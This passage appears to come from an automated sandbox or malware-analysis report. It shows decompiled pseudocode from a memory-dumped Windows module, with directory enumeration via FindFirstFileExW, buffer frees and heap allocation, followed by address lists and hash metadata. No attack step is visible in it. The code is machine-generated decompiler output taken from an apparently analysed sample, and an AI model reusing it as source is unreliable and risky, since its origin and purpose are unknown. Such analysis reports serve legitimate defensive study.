                                                                                                                                                                                                                                										_v12 = _t241;
                                                                                                                                                                                                                                										__eflags = _t241 -  !_t285;
                                                                                                                                                                                                                                										if(_t241 <=  !_t285) {
                                                                                                                                                                                                                                											_push(_t222);
                                                                                                                                                                                                                                											_push(_t296);
                                                                                                                                                                                                                                											_t68 = _t285 + 1; // 0x1
                                                                                                                                                                                                                                											_t225 = _t68 + _t241;
                                                                                                                                                                                                                                											_t300 = E736DA236(_t225, 1);
                                                                                                                                                                                                                                											__eflags = _t285;
                                                                                                                                                                                                                                											if(_t285 == 0) {
                                                                                                                                                                                                                                												L40:
                                                                                                                                                                                                                                												_push(_v12);
                                                                                                                                                                                                                                												_t225 = _t225 - _t285;
                                                                                                                                                                                                                                												_t164 = E736DD1A7(_t300 + _t285, _t225, _v0);
                                                                                                                                                                                                                                												_t311 = _t310 + 0x10;
                                                                                                                                                                                                                                												__eflags = _t164;
                                                                                                                                                                                                                                												if(_t164 != 0) {
                                                                                                                                                                                                                                													goto L45;
                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                													_t229 = _a12;
                                                                                                                                                                                                                                													_t206 = E736DAA77(_t229);
                                                                                                                                                                                                                                													_v12 = _t206;
                                                                                                                                                                                                                                													__eflags = _t206;
                                                                                                                                                                                                                                													if(_t206 == 0) {
                                                                                                                                                                                                                                														 *( *(_t229 + 4)) = _t300;
                                                                                                                                                                                                                                														_t302 = 0;
                                                                                                                                                                                                                                														_t77 = _t229 + 4;
                                                                                                                                                                                                                                														 *_t77 =  *(_t229 + 4) + 4;
                                                                                                                                                                                                                                														__eflags =  *_t77;
                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                														E736DA293(_t300);
                                                                                                                                                                                                                                														_t302 = _v12;
                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                													E736DA293(0);
                                                                                                                                                                                                                                													_t209 = _t302;
                                                                                                                                                                                                                                													goto L37;
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                												_push(_t285);
                                                                                                                                                                                                                                												_t211 = E736DD1A7(_t300, _t225, _a4);
                                                                                                                                                                                                                                												_t311 = _t310 + 0x10;
                                                                                                                                                                                                                                												__eflags = _t211;
                                                                                                                                                                                                                                												if(_t211 != 0) {
                                                                                                                                                                                                                                													L45:
                                                                                                                                                                                                                                													_push(0);
                                                                                                                                                                                                                                													_push(0);
                                                                                                                                                                                                                                													_push(0);
                                                                                                                                                                                                                                													_push(0);
                                                                                                                                                                                                                                													_push(0);
                                                                                                                                                                                                                                													E736DA176();
                                                                                                                                                                                                                                													asm("int3");
                                                                                                                                                                                                                                													_push(_t306);
                                                                                                                                                                                                                                													_t307 = _t311;
                                                                                                                                                                                                                                													_t312 = _t311 - 0x298;
                                                                                                                                                                                                                                													_t166 =  *0x736eb004; // 0xa11be602
                                                                                                                                                                                                                                													_v124 = _t166 ^ _t307;
                                                                                                                                                                                                                                													_t244 = _v108;
                                                                                                                                                                                                                                													_t278 = _v104;
                                                                                                                                                                                                                                													_push(_t225);
                                                                                                                                                                                                                                													_push(0);
                                                                                                                                                                                                                                													_t287 = _v112;
                                                                                                                                                                                                                                													_v724 = _t278;
                                                                                                                                                                                                                                													__eflags = _t244 - _t287;
                                                                                                                                                                                                                                													if(_t244 != _t287) {
                                                                                                                                                                                                                                														while(1) {
                                                                                                                                                                                                                                															_t204 =  *_t244;
                                                                                                                                                                                                                                															__eflags = _t204 - 0x2f;
                                                                                                                                                                                                                                															if(_t204 == 0x2f) {
                                                                                                                                                                                                                                																break;
                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                															__eflags = _t204 - 0x5c;
                                                                                                                                                                                                                                															if(_t204 != 0x5c) {
                                                                                                                                                                                                                                																__eflags = _t204 - 0x3a;
                                                                                                                                                                                                                                																if(_t204 != 0x3a) {
                                                                                                                                                                                                                                																	_t244 = E736DD200(_t287, _t244);
                                                                                                                                                                                                                                																	__eflags = _t244 - _t287;
                                                                                                                                                                                                                                																	if(_t244 != _t287) {
                                                                                                                                                                                                                                																		continue;
                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                															break;
                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                														_t278 = _v616;
                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                													_t168 =  *_t244;
                                                                                                                                                                                                                                													_v609 = _t168;
                                                                                                                                                                                                                                													__eflags = _t168 - 0x3a;
                                                                                                                                                                                                                                													if(_t168 != 0x3a) {
                                                                                                                                                                                                                                														L56:
                                                                                                                                                                                                                                														_t226 = 0;
                                                                                                                                                                                                                                														__eflags = _t168 - 0x2f;
                                                                                                                                                                                                                                														if(__eflags == 0) {
                                                                                                                                                                                                                                															L59:
                                                                                                                                                                                                                                															_t169 = 1;
                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                															__eflags = _t168 - 0x5c;
                                                                                                                                                                                                                                															if(__eflags == 0) {
                                                                                                                                                                                                                                																goto L59;
                                                                                                                                                                                                                                															} else {
                                                                                                                                                                                                                                																__eflags = _t168 - 0x3a;
                                                                                                                                                                                                                                																_t169 = 0;
                                                                                                                                                                                                                                																if(__eflags == 0) {
                                                                                                                                                                                                                                																	goto L59;
                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                														_v676 = _t226;
                                                                                                                                                                                                                                														_v672 = _t226;
                                                                                                                                                                                                                                														_push(_t300);
                                                                                                                                                                                                                                														asm("sbb eax, eax");
                                                                                                                                                                                                                                														_v668 = _t226;
                                                                                                                                                                                                                                														_v664 = _t226;
                                                                                                                                                                                                                                														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
                                                                                                                                                                                                                                														_v660 = _t226;
                                                                                                                                                                                                                                														_v656 = _t226;
                                                                                                                                                                                                                                														_t175 = E736DA466(_t244 - _t287 + 1, _t287,  &_v676, E736DA982(_t278, __eflags));
                                                                                                                                                                                                                                														_t313 = _t312 + 0xc;
                                                                                                                                                                                                                                														asm("sbb eax, eax");
                                                                                                                                                                                                                                														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
                                                                                                                                                                                                                                														_t301 = _t179;
                                                                                                                                                                                                                                														__eflags = _t301 - 0xffffffff;
                                                                                                                                                                                                                                														if(_t301 != 0xffffffff) {
                                                                                                                                                                                                                                															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
                                                                                                                                                                                                                                															__eflags = _t249;
                                                                                                                                                                                                                                															_v648 = _t249 >> 2;
                                                                                                                                                                                                                                															do {
                                                                                                                                                                                                                                																_v640 = _t226;
                                                                                                                                                                                                                                																_v636 = _t226;
                                                                                                                                                                                                                                																_v632 = _t226;
                                                                                                                                                                                                                                																_v628 = _t226;
                                                                                                                                                                                                                                																_v624 = _t226;
                                                                                                                                                                                                                                																_v620 = _t226;
                                                                                                                                                                                                                                																_t185 = E736DA397( &(_v608.cFileName),  &_v640,  &_v609, E736DA982(_t278, __eflags));
                                                                                                                                                                                                                                																_t313 = _t313 + 0x10;
                                                                                                                                                                                                                                																asm("sbb eax, eax");
                                                                                                                                                                                                                                																_t188 =  !( ~_t185) & _v632;
                                                                                                                                                                                                                                																__eflags =  *_t188 - 0x2e;
                                                                                                                                                                                                                                																if( *_t188 != 0x2e) {
                                                                                                                                                                                                                                																	L67:
                                                                                                                                                                                                                                																	_push(_v616);
                                                                                                                                                                                                                                																	_push(_v644);
                                                                                                                                                                                                                                																	_push(_t287);
                                                                                                                                                                                                                                																	_push(_t188);
                                                                                                                                                                                                                                																	L33();
                                                                                                                                                                                                                                																	_t313 = _t313 + 0x10;
                                                                                                                                                                                                                                																	_v652 = _t188;
                                                                                                                                                                                                                                																	__eflags = _t188;
                                                                                                                                                                                                                                																	if(_t188 != 0) {
                                                                                                                                                                                                                                																		__eflags = _v620 - _t226;
                                                                                                                                                                                                                                																		if(_v620 != _t226) {
                                                                                                                                                                                                                                																			E736DA293(_v632);
                                                                                                                                                                                                                                																			_t188 = _v652;
                                                                                                                                                                                                                                																		}
                                                                                                                                                                                                                                																		_t226 = _t188;
                                                                                                                                                                                                                                																	} else {
                                                                                                                                                                                                                                																		goto L68;
                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                																} else {
                                                                                                                                                                                                                                																	_t255 =  *((intOrPtr*)(_t188 + 1));
                                                                                                                                                                                                                                																	__eflags = _t255;
                                                                                                                                                                                                                                																	if(_t255 == 0) {
                                                                                                                                                                                                                                																		goto L68;
                                                                                                                                                                                                                                																	} else {
                                                                                                                                                                                                                                																		__eflags = _t255 - 0x2e;
                                                                                                                                                                                                                                																		if(_t255 != 0x2e) {
                                                                                                                                                                                                                                																			goto L67;
                                                                                                                                                                                                                                																		} else {
                                                                                                                                                                                                                                																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
                                                                                                                                                                                                                                																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
                                                                                                                                                                                                                                																				goto L68;
                                                                                                                                                                                                                                																			} else {
                                                                                                                                                                                                                                																				goto L67;
                                                                                                                                                                                                                                																			}
                                                                                                                                                                                                                                																		}
                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                																L76:
                                                                                                                                                                                                                                																FindClose(_t301);
                                                                                                                                                                                                                                																goto L77;
                                                                                                                                                                                                                                																L68:
                                                                                                                                                                                                                                																__eflags = _v620 - _t226;
                                                                                                                                                                                                                                																if(_v620 != _t226) {
                                                                                                                                                                                                                                																	E736DA293(_v632);
                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                																__eflags = FindNextFileW(_t301,  &_v608);
                                                                                                                                                                                                                                															} while (__eflags != 0);
                                                                                                                                                                                                                                															_t196 = _v616;
                                                                                                                                                                                                                                															_t257 = _v648;
                                                                                                                                                                                                                                															_t278 =  *_t196;
                                                                                                                                                                                                                                															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
                                                                                                                                                                                                                                															__eflags = _t257 - _t199;
                                                                                                                                                                                                                                															if(_t257 != _t199) {
                                                                                                                                                                                                                                																E736DCCB0(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E736DA2CD);
                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                															goto L76;
                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                															_push(_v616);
                                                                                                                                                                                                                                															_push(_t226);
                                                                                                                                                                                                                                															_push(_t226);
                                                                                                                                                                                                                                															_push(_t287);
                                                                                                                                                                                                                                															L33();
                                                                                                                                                                                                                                															_t226 = _t179;
                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                														L77:
                                                                                                                                                                                                                                														__eflags = _v656;
                                                                                                                                                                                                                                														_pop(_t300);
                                                                                                                                                                                                                                														if(_v656 != 0) {
                                                                                                                                                                                                                                															E736DA293(_v668);
                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                														_t190 = _t226;
                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                														_t190 = _t287 + 1;
                                                                                                                                                                                                                                														__eflags = _t244 - _t287 + 1;
                                                                                                                                                                                                                                														if(_t244 == _t287 + 1) {
                                                                                                                                                                                                                                															_t168 = _v609;
                                                                                                                                                                                                                                															goto L56;
                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                															_push(_t278);
                                                                                                                                                                                                                                															_push(0);
                                                                                                                                                                                                                                															_push(0);
                                                                                                                                                                                                                                															_push(_t287);
                                                                                                                                                                                                                                															L33();
                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                													_pop(_t288);
                                                                                                                                                                                                                                													__eflags = _v16 ^ _t307;
                                                                                                                                                                                                                                													_pop(_t227);
                                                                                                                                                                                                                                													return E736D6EA3(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                													goto L40;
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                											_t209 = 0xc;
                                                                                                                                                                                                                                											L37:
                                                                                                                                                                                                                                											return _t209;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										goto L23;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									goto L81;
                                                                                                                                                                                                                                									L23:
                                                                                                                                                                                                                                									_t212 = _v12;
                                                                                                                                                                                                                                									_t263 = _v16;
                                                                                                                                                                                                                                									 *((intOrPtr*)(_v32 + _t212)) = _t263;
                                                                                                                                                                                                                                									_t140 = _t212 + 4;
                                                                                                                                                                                                                                									_t233 = _t263 + _v20;
                                                                                                                                                                                                                                									_v16 = _t233;
                                                                                                                                                                                                                                									_v12 = _t140;
                                                                                                                                                                                                                                									__eflags = _t140 - _v40;
                                                                                                                                                                                                                                								} while (_t140 != _v40);
                                                                                                                                                                                                                                								goto L24;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t297 = _t296 | 0xffffffff;
                                                                                                                                                                                                                                							_v12 = _t297;
                                                                                                                                                                                                                                							L25:
                                                                                                                                                                                                                                							E736DA293(_t222);
                                                                                                                                                                                                                                							_pop(_t234);
                                                                                                                                                                                                                                							goto L26;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						while(1) {
                                                                                                                                                                                                                                							_v8 = 0x3f2a;
                                                                                                                                                                                                                                							_v6 = _t222;
                                                                                                                                                                                                                                							_t217 = E736DD1C0(_t132,  &_v8);
                                                                                                                                                                                                                                							_t234 =  *_t292;
                                                                                                                                                                                                                                							__eflags = _t217;
                                                                                                                                                                                                                                							if(_t217 != 0) {
                                                                                                                                                                                                                                								_push( &(_v608.cAlternateFileName));
                                                                                                                                                                                                                                								_push(_t217);
                                                                                                                                                                                                                                								_push(_t234);
                                                                                                                                                                                                                                								L46();
                                                                                                                                                                                                                                								_t309 = _t309 + 0xc;
                                                                                                                                                                                                                                								_v12 = _t217;
                                                                                                                                                                                                                                								_t297 = _t217;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t218 =  &(_v608.cAlternateFileName);
                                                                                                                                                                                                                                								_push(_t218);
                                                                                                                                                                                                                                								_push(_t222);
                                                                                                                                                                                                                                								_push(_t222);
                                                                                                                                                                                                                                								_push(_t234);
                                                                                                                                                                                                                                								L33();
                                                                                                                                                                                                                                								_t297 = _t218;
                                                                                                                                                                                                                                								_t309 = _t309 + 0x10;
                                                                                                                                                                                                                                								_v12 = _t297;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							__eflags = _t297;
                                                                                                                                                                                                                                							if(_t297 != 0) {
                                                                                                                                                                                                                                								break;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_t292 =  &(_a4[1]);
                                                                                                                                                                                                                                							_a4 = _t292;
                                                                                                                                                                                                                                							_t132 =  *_t292;
                                                                                                                                                                                                                                							__eflags = _t132;
                                                                                                                                                                                                                                							if(_t132 != 0) {
                                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t283 = _v608.cAlternateFileName;
                                                                                                                                                                                                                                								_t232 = _v40;
                                                                                                                                                                                                                                								goto L9;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L81;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t283 = _v608.cAlternateFileName;
                                                                                                                                                                                                                                						L26:
                                                                                                                                                                                                                                						_t272 = _t283;
                                                                                                                                                                                                                                						_v32 = _t272;
                                                                                                                                                                                                                                						__eflags = _v40 - _t272;
                                                                                                                                                                                                                                						asm("sbb ecx, ecx");
                                                                                                                                                                                                                                						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
                                                                                                                                                                                                                                						__eflags = _t236;
                                                                                                                                                                                                                                						_v28 = _t236;
                                                                                                                                                                                                                                						if(_t236 != 0) {
                                                                                                                                                                                                                                							_t299 = _t236;
                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                								E736DA293( *_t283);
                                                                                                                                                                                                                                								_t222 = _t222 + 1;
                                                                                                                                                                                                                                								_t283 = _t283 + 4;
                                                                                                                                                                                                                                								__eflags = _t222 - _t299;
                                                                                                                                                                                                                                							} while (_t222 != _t299);
                                                                                                                                                                                                                                							_t283 = _v608.cAlternateFileName;
                                                                                                                                                                                                                                							_t297 = _v12;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						E736DA293(_t283);
                                                                                                                                                                                                                                						goto L31;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t219 = E736DA223(_t317);
                                                                                                                                                                                                                                					_t297 = 0x16;
                                                                                                                                                                                                                                					 *_t219 = _t297;
                                                                                                                                                                                                                                					E736DA166();
                                                                                                                                                                                                                                					L31:
                                                                                                                                                                                                                                					return _t297;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				L81:
                                                                                                                                                                                                                                			}
                                                                                                                                                                                                                                0x736da56e
                                                                                                                                                                                                                                0x736da572
                                                                                                                                                                                                                                0x736da575
                                                                                                                                                                                                                                0x736da578
                                                                                                                                                                                                                                0x736da578
                                                                                                                                                                                                                                0x736da578
                                                                                                                                                                                                                                0x736da585
                                                                                                                                                                                                                                0x736da587
                                                                                                                                                                                                                                0x736da58a
                                                                                                                                                                                                                                0x736da58c
                                                                                                                                                                                                                                0x736da5a4
                                                                                                                                                                                                                                0x736da5a7
                                                                                                                                                                                                                                0x736da5aa
                                                                                                                                                                                                                                0x736da5ac
                                                                                                                                                                                                                                0x736da5af
                                                                                                                                                                                                                                0x736da5b1
                                                                                                                                                                                                                                0x736da5b4
                                                                                                                                                                                                                                0x736da5b7
                                                                                                                                                                                                                                0x736da614
                                                                                                                                                                                                                                0x736da617
                                                                                                                                                                                                                                0x736da61a
                                                                                                                                                                                                                                0x736da61c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da5b9
                                                                                                                                                                                                                                0x736da5bb
                                                                                                                                                                                                                                0x736da5bb
                                                                                                                                                                                                                                0x736da5bd
                                                                                                                                                                                                                                0x736da5c0
                                                                                                                                                                                                                                0x736da5c0
                                                                                                                                                                                                                                0x736da5c2
                                                                                                                                                                                                                                0x736da5c4
                                                                                                                                                                                                                                0x736da5ca
                                                                                                                                                                                                                                0x736da5cd
                                                                                                                                                                                                                                0x736da5cd
                                                                                                                                                                                                                                0x736da5cf
                                                                                                                                                                                                                                0x736da5d0
                                                                                                                                                                                                                                0x736da5d0
                                                                                                                                                                                                                                0x736da5d7
                                                                                                                                                                                                                                0x736da5da
                                                                                                                                                                                                                                0x736da5de
                                                                                                                                                                                                                                0x736da5eb
                                                                                                                                                                                                                                0x736da5f0
                                                                                                                                                                                                                                0x736da5f3
                                                                                                                                                                                                                                0x736da5f5
                                                                                                                                                                                                                                0x736da66b
                                                                                                                                                                                                                                0x736da66c
                                                                                                                                                                                                                                0x736da66d
                                                                                                                                                                                                                                0x736da66e
                                                                                                                                                                                                                                0x736da66f
                                                                                                                                                                                                                                0x736da670
                                                                                                                                                                                                                                0x736da675
                                                                                                                                                                                                                                0x736da679
                                                                                                                                                                                                                                0x736da67b
                                                                                                                                                                                                                                0x736da67c
                                                                                                                                                                                                                                0x736da67f
                                                                                                                                                                                                                                0x736da67f
                                                                                                                                                                                                                                0x736da682
                                                                                                                                                                                                                                0x736da682
                                                                                                                                                                                                                                0x736da684
                                                                                                                                                                                                                                0x736da685
                                                                                                                                                                                                                                0x736da685
                                                                                                                                                                                                                                0x736da689
                                                                                                                                                                                                                                0x736da68a
                                                                                                                                                                                                                                0x736da691
                                                                                                                                                                                                                                0x736da694
                                                                                                                                                                                                                                0x736da697
                                                                                                                                                                                                                                0x736da699
                                                                                                                                                                                                                                0x736da6a3
                                                                                                                                                                                                                                0x736da6a4
                                                                                                                                                                                                                                0x736da6a5
                                                                                                                                                                                                                                0x736da6a8
                                                                                                                                                                                                                                0x736da6b2
                                                                                                                                                                                                                                0x736da6b6
                                                                                                                                                                                                                                0x736da6b8
                                                                                                                                                                                                                                0x736da6cc
                                                                                                                                                                                                                                0x736da6cc
                                                                                                                                                                                                                                0x736da6cf
                                                                                                                                                                                                                                0x736da6d9
                                                                                                                                                                                                                                0x736da6de
                                                                                                                                                                                                                                0x736da6e1
                                                                                                                                                                                                                                0x736da6e3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da6e5
                                                                                                                                                                                                                                0x736da6e5
                                                                                                                                                                                                                                0x736da6ea
                                                                                                                                                                                                                                0x736da6f1
                                                                                                                                                                                                                                0x736da6f4
                                                                                                                                                                                                                                0x736da6f6
                                                                                                                                                                                                                                0x736da707
                                                                                                                                                                                                                                0x736da709
                                                                                                                                                                                                                                0x736da70b
                                                                                                                                                                                                                                0x736da70b
                                                                                                                                                                                                                                0x736da70b
                                                                                                                                                                                                                                0x736da6f8
                                                                                                                                                                                                                                0x736da6f9
                                                                                                                                                                                                                                0x736da6fe
                                                                                                                                                                                                                                0x736da701
                                                                                                                                                                                                                                0x736da710
                                                                                                                                                                                                                                0x736da716
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da719
                                                                                                                                                                                                                                0x736da6ba
                                                                                                                                                                                                                                0x736da6ba
                                                                                                                                                                                                                                0x736da6c0
                                                                                                                                                                                                                                0x736da6c5
                                                                                                                                                                                                                                0x736da6c8
                                                                                                                                                                                                                                0x736da6ca
                                                                                                                                                                                                                                0x736da71c
                                                                                                                                                                                                                                0x736da71e
                                                                                                                                                                                                                                0x736da71f
                                                                                                                                                                                                                                0x736da720
                                                                                                                                                                                                                                0x736da721
                                                                                                                                                                                                                                0x736da722
                                                                                                                                                                                                                                0x736da723
                                                                                                                                                                                                                                0x736da728
                                                                                                                                                                                                                                0x736da72b
                                                                                                                                                                                                                                0x736da72c
                                                                                                                                                                                                                                0x736da72e
                                                                                                                                                                                                                                0x736da734
                                                                                                                                                                                                                                0x736da970
                                                                                                                                                                                                                                0x736da782
                                                                                                                                                                                                                                0x736da782
                                                                                                                                                                                                                                0x736da785
                                                                                                                                                                                                                                0x736da787
                                                                                                                                                                                                                                0x736da79c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da789
                                                                                                                                                                                                                                0x736da789
                                                                                                                                                                                                                                0x736da78c
                                                                                                                                                                                                                                0x736da78d
                                                                                                                                                                                                                                0x736da78e
                                                                                                                                                                                                                                0x736da78f
                                                                                                                                                                                                                                0x736da794
                                                                                                                                                                                                                                0x736da787
                                                                                                                                                                                                                                0x736da975
                                                                                                                                                                                                                                0x736da976
                                                                                                                                                                                                                                0x736da978
                                                                                                                                                                                                                                0x736da981
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da6ca
                                                                                                                                                                                                                                0x736da69b
                                                                                                                                                                                                                                0x736da69d
                                                                                                                                                                                                                                0x736da69e
                                                                                                                                                                                                                                0x736da6a2
                                                                                                                                                                                                                                0x736da6a2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da5f7
                                                                                                                                                                                                                                0x736da5f7
                                                                                                                                                                                                                                0x736da5fd
                                                                                                                                                                                                                                0x736da600
                                                                                                                                                                                                                                0x736da603
                                                                                                                                                                                                                                0x736da606
                                                                                                                                                                                                                                0x736da609
                                                                                                                                                                                                                                0x736da60c
                                                                                                                                                                                                                                0x736da60f
                                                                                                                                                                                                                                0x736da60f
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da5c0
                                                                                                                                                                                                                                0x736da58e
                                                                                                                                                                                                                                0x736da58e
                                                                                                                                                                                                                                0x736da591
                                                                                                                                                                                                                                0x736da61e
                                                                                                                                                                                                                                0x736da61f
                                                                                                                                                                                                                                0x736da624
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da624
                                                                                                                                                                                                                                0x736da4c5
                                                                                                                                                                                                                                0x736da4c5
                                                                                                                                                                                                                                0x736da4c8
                                                                                                                                                                                                                                0x736da4d0
                                                                                                                                                                                                                                0x736da4d3
                                                                                                                                                                                                                                0x736da4da
                                                                                                                                                                                                                                0x736da4dc
                                                                                                                                                                                                                                0x736da4de
                                                                                                                                                                                                                                0x736da4f9
                                                                                                                                                                                                                                0x736da4fa
                                                                                                                                                                                                                                0x736da4fb
                                                                                                                                                                                                                                0x736da4fc
                                                                                                                                                                                                                                0x736da501
                                                                                                                                                                                                                                0x736da504
                                                                                                                                                                                                                                0x736da507
                                                                                                                                                                                                                                0x736da4e0
                                                                                                                                                                                                                                0x736da4e0
                                                                                                                                                                                                                                0x736da4e3
                                                                                                                                                                                                                                0x736da4e4
                                                                                                                                                                                                                                0x736da4e5
                                                                                                                                                                                                                                0x736da4e6
                                                                                                                                                                                                                                0x736da4e7
                                                                                                                                                                                                                                0x736da4ec
                                                                                                                                                                                                                                0x736da4ee
                                                                                                                                                                                                                                0x736da4f1
                                                                                                                                                                                                                                0x736da4f1
                                                                                                                                                                                                                                0x736da509
                                                                                                                                                                                                                                0x736da50b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da514
                                                                                                                                                                                                                                0x736da517
                                                                                                                                                                                                                                0x736da51a
                                                                                                                                                                                                                                0x736da51c
                                                                                                                                                                                                                                0x736da51e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da520
                                                                                                                                                                                                                                0x736da520
                                                                                                                                                                                                                                0x736da523
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da523
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da51e
                                                                                                                                                                                                                                0x736da599
                                                                                                                                                                                                                                0x736da625
                                                                                                                                                                                                                                0x736da628
                                                                                                                                                                                                                                0x736da62c
                                                                                                                                                                                                                                0x736da635
                                                                                                                                                                                                                                0x736da638
                                                                                                                                                                                                                                0x736da63c
                                                                                                                                                                                                                                0x736da63c
                                                                                                                                                                                                                                0x736da63e
                                                                                                                                                                                                                                0x736da641
                                                                                                                                                                                                                                0x736da643
                                                                                                                                                                                                                                0x736da645
                                                                                                                                                                                                                                0x736da647
                                                                                                                                                                                                                                0x736da64c
                                                                                                                                                                                                                                0x736da64d
                                                                                                                                                                                                                                0x736da651
                                                                                                                                                                                                                                0x736da651
                                                                                                                                                                                                                                0x736da655
                                                                                                                                                                                                                                0x736da658
                                                                                                                                                                                                                                0x736da658
                                                                                                                                                                                                                                0x736da65c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da663
                                                                                                                                                                                                                                0x736da495
                                                                                                                                                                                                                                0x736da495
                                                                                                                                                                                                                                0x736da49c
                                                                                                                                                                                                                                0x736da49d
                                                                                                                                                                                                                                0x736da49f
                                                                                                                                                                                                                                0x736da664
                                                                                                                                                                                                                                0x736da66a
                                                                                                                                                                                                                                0x736da66a
                                                                                                                                                                                                                                0x00000000

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
• Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
• Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
• Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
• Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
• Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
Similarity
• API ID: _free
• String ID: *?
• API String ID: 269201875-2564092906
• Opcode ID: 64ce4d84af9dd0348b0bdc1ed56a3b0106e437a61b3be5bb0858fc8ce406034e
• Instruction ID: 15dcc314aeeddb05f5ee9c0b6508e268adee9202471e1a7ab2ecf7d7b893703f
• Opcode Fuzzy Hash: 64ce4d84af9dd0348b0bdc1ed56a3b0106e437a61b3be5bb0858fc8ce406034e
• Instruction Fuzzy Hash: 3F615EB5D142199FDF15CFA9C9806EDFBF9EF48310B18816AD815E7380E635DE418B90
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 56%
E00A8462F(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
	void* _v8;
	void* __edi;
	intOrPtr _t18;
	void* _t24;
	void* _t30;
	void* _t36;
	void* _t40;
	intOrPtr _t42;

	_t36 = __edx;
	_t32 = __ecx;
	_push(__ecx);
	_push(__ecx);
	_t42 =  *0xa8d380; // 0x1ae9ba8
	_push(0x800);
	_push(0);
	_push( *0xa8d270);
	if( *0xa8d284 >= 5) {
		if(RtlAllocateHeap() == 0) {
			L6:
			_t30 = 8;
			L7:
			if(_t30 != 0) {
				L10:
				 *0xa8d284 =  *0xa8d284 + 1;
				L11:
				return _t30;
			}
			_t44 = _a4;
			_t40 = _v8;
			 *_a16 = _a4;
			 *_a20 = E00A8680B(_t44, _t40);
			_t18 = E00A82274(_t40, _t44);
			if(_t18 != 0) {
				 *_a8 = _t40;
				 *_a12 = _t18;
				if( *0xa8d284 < 5) {
					 *0xa8d284 =  *0xa8d284 & 0x00000000;
				}
				goto L11;
			}
			_t30 = 0xbf;
			E00A8651D();
